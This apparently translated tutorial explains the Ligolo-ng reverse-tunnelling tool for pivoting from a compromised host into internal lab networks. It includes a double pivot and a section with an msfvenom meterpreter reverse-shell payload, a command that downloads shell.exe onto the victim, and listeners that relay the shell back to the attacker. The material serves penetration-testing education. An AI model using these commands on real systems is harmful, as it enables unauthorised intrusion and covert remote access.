Ligolo-ng is a new generation tool for reverse tunneling. It is especially useful for pentesters and red teamers who want to establish reliable connections when rotating from their attacker computer to a hard-to-reach network.
It is an advanced, easy-to-use tool that uses TUN interfaces instead of traditional SOCKS proxies. It was developed by Nicolas Chatelain to be simple, light and fast, and it provides an excellent solution for this purpose.
Table of Contents
Key objectives
Ligolo-ng allows pentesters to create reverse tunneling from compromised systems to the attack machine, allowing testers to effectively explore and interact with the target environment's internal network.
Red teamers use Ligolo-ng to maintain covert access to systems within a target's network. Its ability to bypass firewalls and NAT devices by initiating connections from the inside out is important for covert operations.
Basic features:
- It uses TUN connections, making it more efficient and easier than SOCKS proxies.
- It has a simple command line interface with intuitive options for ease of use
- It supports TLS for secure communication with options for automatic certificate management through Let's Encrypt
- It works on multiple operating systems, including Windows, Linux, and macOS.
- Designed for high performance with features such as multiplexing, which allows multiple data streams on a single connection.
- The agent file runs without elevated privileges, making it easy to install and use in various environments.
Pivoting explained
Pivoting is used in penetration testing and hacking to gain access to additional systems on a target network by exploiting a compromised system. It allows attackers to browse the network, bypassing segmentation and firewall restrictions.
Steps we follow in Pivoting
Let's briefly review the main steps of pivoting, using the chart above as an example.
Initial compromise
The attacker starts by compromising an initial machine on the network. In the chart, this is shown as “Server”, which is dual installed with IP addresses 192.168.37.145 (external network) and 10.0.0.128 (internal network).
Pivot point setting
Once the attacker controls the server, they can use it as a pivot point. This compromised server or “jump box” becomes the bridge that allows the attacker to gain access to previously inaccessible internal parts of the network.
Routing traffic through the pivot point
The attacker uses the attack machine to route traffic through the compromised server. This is done using various tunneling techniques and tools, such as SSH, or tools specifically designed for pivoting, such as Ligolo-ng.
Access to the internal network
With the pivot point in place, the attacker can now access other machines on the internal network that were not directly accessible from the external network.
In the graph, the attacker uses the compromised server to reach the Windows computer with IP address 10.0.0.129.
Once the attacker is rotated into the internal network, they can perform further reconnaissance, exploit additional vulnerabilities, and gain deeper access to data or systems.
How does Ligolo-ng work?
Ligolo-ng solves the problem of accessing internal networks by leveraging a compromised dual-homing system as a pivot point. It allows you to create tunnels from a secure reverse connection that move laterally within a network and gain access to otherwise inaccessible systems.
Initial installation
You compromise a machine within the external network, which will serve as an “Agent”. Your own machine – usually a Kali Linux system – will be the “Proxy” server.
Create a reverse tunnel
The compromised machine (Agent) initiates a connection back to the proxy server. This reverse connection is crucial as it bypasses network restrictions such as firewalls that block incoming connections.
Create a virtual network interface
Ligolo creates a TUN (network tunnel) interface to the proxy server. This virtual interface handles the routing of packets to and from the internal network through the Agent.
Secure communication
Agent and proxy can be encrypted using TLS, ensuring data integrity and confidentiality.
Traffic routing
The proxy routes the traffic over the TUN interface to the Agent, which then forwards it to the internal network. This allows you to interact with the internal network as if you were directly connected.
Access to internal resources
With the tunnel installed, you can use tools like Nmap, SSH, or RDP to interact with internal systems, perform reconnaissance, and exploit vulnerabilities.
How to use the Ligolo-ng tool
Now that we've shown you what pivoting is and how Ligolo-ng can help you, let's see how you can do it yourself. For our tutorial, we will be using a fully updated Kali OS. Let's show you how to use Ligolo-ng.
For our guide, let's say we're doing a penetration test on an Ubuntu host and we've found that it's dual-homed.
The interfaces are as follows:
ens33: 192.168.37.134 (External Network)
ens37: 192.168.56.128 (Internal Network)
And the Kali machine has the following IP:
eth0: 192.168.37.152
We want to use the Ubuntu machine as a pivot point to access the internal network (192.168.56.0/24) and continue our testing, because we cannot do further discovery from the external network.
If we try to run a host lookup with Nmap, we won't be able to see any hosts on the internal network unless we rotate through the Ubuntu machine.
The screenshot above shows that Nmap cannot return any results because we do not yet have access to this internal network.
1. Installation
To get started, you need to have the Ligolo-ng proxy file on your system. If you are using Kali Linux, the process is simple. As of update 2024.2, Ligolo-ng is included in the official Kali repositories.
You can install it by running the following command:
sudo apt install ligolo-ng
.
This will install the Ligolo-ng proxy and agent on your Kali Linux system. However, you'll still need to download the agent files from the GitHub repository for the target machine you want to pivot from, such as Windows or other Linux distributions.
To download the agent files, visit the Ligolo-ng releases page on GitHub and download the appropriate agent for your target system. We will download Linux and Windows 64bit to the opt folder and then extract the files.
Once complete, the agent files should be ready to transfer to the target.
In our case, we had SSH access to the Ubuntu machine and used Secure Copy Protocol (SCP) to download the agent from the Kali machine.
2. Proxy Setup
Before running the agent on the exposed computer, you need to configure the proxy in Kali.
The first step is to create the TUN interface using the following commands.
sudo ip tuntap add user <Your Username> mode tun ligolo
sudo ip link set ligolo up
This will create a new TUN interface named ligolo and display it. The TUN interface acts as a virtual network interface, allowing Ligolo-ng to route network traffic.
If you installed the proxy using the apt install command, you can run it by typing:
Ligolo-proxy
Let's quickly explore the available options by checking out the help section:
ligolo-proxy -h
-allow-domains string
If you want to allow automatic certificate requests only for specific domains, list them here, separating them with commas. If you leave it blank, it will allow all domains.
-autocert
Use this option to automatically obtain and configure TLS certificates from Let's Encrypt. This assumes that port 80 is accessible for certificate validation.
-certfile string
If you already have a TLS certificate, use this option to provide the path to the certificate file. This is useful for using pre-issued certificates.
-keyfile string
Along with the -certfile option, this option is used to specify the private key path corresponding to the TLS certificate.
-laddr string
Use this option to set the IP address and port on which the proxy should listen. The default address listens on all interfaces on port 11601.
selfcert
This option generates self-signed certificates on the fly. It is useful for lab environments where you do not need certificates from a trusted CA.
To start the proxy with the self-cert option, type the following command:
ligolo-proxy -selfcert
3. Certificates
While using self-signed certificates in Ligolo-ng can be a convenient option for lab environments with minimal security risks, it is important to understand the implications and limitations of this approach.
Properly issued certificates from a trusted Certificate Authority (CA) are highly recommended for live testing or real-world environments. It helps avoid risks associated with self-signed certificates, such as man-in-the-middle attacks.
Let's quickly go through the steps to run Ligolo-ng with a trusted certificate.
Obtain a certificate from a trusted CA
Purchase or obtain a certificate from a trusted Certificate Authority (CA). Make sure you have the certificate file (eg ligolo-ng.crt) and the corresponding key file (eg ligolo-ng.key).
Configure the Ligolo-ng proxy to use the issued certificates
Start the Ligolo-ng proxy with the -certfile and -keyfile options to specify the certificate and key you have issued.
ligolo-proxy -certfile ligolo-ng.crt -keyfile ligolo-ng.key
Run the agent ignoring the certificates
Start the Ligolo-ng agent normally, as it will trust the properly issued certificate.
./agent -connect attacker_server:11601
4. Agent Setup
Starting the agent is simple. Just start the agent from the folder you saved it in. If you're using Linux, make sure it's executable using the chmod +x command. Then, to start the agent and connect it to the Ligolo-ng proxy, run the following command:
./agent -connect <Attack IP>:11601 -ignore-cert
In this command, replace it with the IP address of the Kali machine running the Ligolo-ng proxy. We use the -ignore-cert flag because we used a self-signed certificate with our proxy, since this demo takes place in an isolated lab.
Once the agent is logged in, you will see a confirmation message on the agent's screen.
The message indicates that the agent is running on a machine with username Ubuntu and hostname ubuntu-virtual-machine. It also shows the IP address and port number of the agent machine from which it has connected to the proxy.
Now that we are connected to the agent, let's look at some commands we can run, starting with the “help” command.
The menu lists various available commands, which are categorized into general commands, listener management, and tunneling functions.
5. Tunnel Setup
Finally, before we interact with the internal network, we need to set up the tunnel and configure the route to establish a connection.
Let's run the “session” command, select our session and press enter to interact with our jumpbox (Ubuntu).
From here, we can run the “ifconfig” command to verify the network connections on the connected agent.
We can confirm that the Ubuntu machine has access to the 192.168.56.0/24 network. Our next step is to add an entry to the routing table so that Ligolo can route traffic through the tunnel and reach the target network. To do this, we can use the command:
sudo ip route add <Internal_Network> dev ligolo
You will then need to start the tunnel and go to the jump box, which you can do by simply typing “start".
From here, you can run any tool from Kali to interact with the exposed internal network as if you were directly connected to it.
For example, you can use Nmap to scan the internal network, netcat to set up listeners or connect to services, and SSH to access other internal machines.
Running a Ligolo-ng Double Pivot
In some cases, the newly compromised host will have two interfaces, allowing you to further explore the network and find more hosts. In this scenario, you should perform a double rotation.
The new Windows host we just checked has the following interfaces.
eth0: 192.168.56.136
eth1: 10.1.30.132
We will use this exposed Windows host as an additional pivot point. To do this, we need to download the agent.exe file, which allows us to interact with the newly discovered 10.1.30.0/24 network.
1. Add a second TUN interface
To double pivot with Ligolo-ng, we'll need to create a second tun interface like the first. You can call it whatever you want. We called ours ligolo-double.
2. Create listener
The next step is to add a listener on port 11601 to the existing Ligolo-ng session and redirect it to our machine.
listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
Make sure it is added with the following command:
listener_list
As a result, we can use the agent on the newly exposed machine to connect to Ligolo-ng again and establish a new session, this time on the Windows machine, which will allow us access to the 10.1.30.0/24 network.
3. Connection to the proxy server
Next, we need to run the agent on the Windows host to connect to the forwarded port on Ubuntu.
./agent.exe -connect <IP of First Pivot Point>:11601 -ignore-cert
Next, we need to verify the connection to Kali by checking if the Windows agent has connected through the forwarded port.
4. Start a tunnel and add a route
Our final step is to switch our session to the second pivot point (Windows), start the tunnel, and then add a route to the new 10.1.30.0/24 network.
sudo ip add route <New_Network> dev ligolo-double
We will be able to interact with the new network from the Kali machine and run all the same tools as we did with the single axis.
You could continue with a triple pivot using Ligolo-ng, following the same steps we did with the double pivot.
Ligolo-ng Reverse Shells and Callbacks
If you want to catch a reverse shell or transfer files from the attacker's machine to a machine on the newly accessed internal network, you should set up some listeners for Ligolo-ng to establish a connection and facilitate communication between of the two systems.
We will walk you through transferring a file and then watching a reverse shell.
Before we start, we'll show you the shell we created using Msfvenom. When you create a reverse shell, make sure you use the IP of the agent machine - in our case, the Ubuntu machine - and the port you set on your listener.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.128 LPORT=5656 -f exe -o shell.exe
File transfer
Before transferring files, you need to set up a listener in the Ligolo session to forward traffic from Kali to the newly exposed Windows computer. This will create a listener on the agent machine and redirect it to Kali.
listener_add --addr 0.0.0.0:2222 --to 127.0.0.1:8888 --tcp
This will forward traffic from Ubuntu (agent) on port 2222 to the Kali machine on port 8888.
Host the file using the Python server, making sure to use port 8888.
On the exposed Windows host, we can issue the following command. Make sure the IP you use is that of the agent machine and use the port you chose for the agent listener. In our case, it is port 2222.
Invoke-WebRequest -Uri "http://192.168.56.128:2222/shell.exe" -OutFile shell.exe
Reverse Shells
Now that we have ported the reverse shell to the host, how do we get it to Kali?
We should create another listener. This will allow the reverse shell to tunnel through the agent and back to the attack point.
listener_add --addr 0.0.0.0:5656 --to 127.0.0.1:4444 --tcp
This will create a listener on the Ubuntu pivot that will listen on port 5656 on all interfaces, forwarding any incoming traffic on that port to port 4444 on Kali.
We need to create something that the shell will catch. In our example, we use Metasploit's multi-handler.
If you plan to use the multi-handler, make sure you use the LHOST of 0.0.0.0 and the LPORT from the proxy redirect address. In our case, it is port 4444.
Now, we will run our shell from the Windows host.
And, back on the Kali machine, we'll have a reverse shell.
Jump Box Access
To access the jump box using Ligolo-ng, we can add a special route and use a dedicated IP address generated by Ligolo-ng. Ligolo-ng uses the IP address 240.0.0.0.1 to facilitate easy access to the local ports of the connected remote agent.
Here's how it works.
Ligolo-ng reserves the IP address 240.0.0.1 to automatically redirect traffic to the agent's local IP address (127.0.0.1). When you send traffic to 240.0.0.1, Ligolo-ng redirects it to the agent's local IP, allowing you to interact with the services running on it.
The only step required to access the first pivot box is to add a route to the 240.0.0.1/32 subnet.
sudo ip route add 240.0.0.1/32 dev ligolo
Now, whenever you want to interact with jumphost, use IP 240.0.0.1. For example, we can run an Nmap scan.
Advantages of using Ligolo-ng
Ligolo-ng is designed to be more efficient and user-friendly than some other rotation tools out there.
Here are its main advantages compared to tools like Chisel and SSHuttle.
Ligolo-ng is designed with a user-friendly interface, making it easy for penetration testers to set up and use. It uses a single binary for the proxy and agent, simplifying development. Ligolo-ng uses TCP tunneling, offering good performance and stability.
It supports multiplexing, which creates multiple connections over a single TCP connection, greatly reducing overhead.
Ligolo-ng can forward both TCP and UDP traffic, providing more flexibility than tools that only handle TCP. Where Chisel requires you to edit the Proxychains conf file, Ligolo-ng simplifies the process by eliminating the need to edit the file.
In short, we recommend using Ligolo-ng for all your pivoting needs.
Conclusion
Ligolo-ng is a must in any pentester or ethical hacker's toolbox. His pivoting ability can make all the difference.
Adding Ligolo-ng to your tools will boost your efficiency and effectiveness.
Now you have seen its power in both pivoting and double pivoting and how it can handle reverse shells as well as file transfers.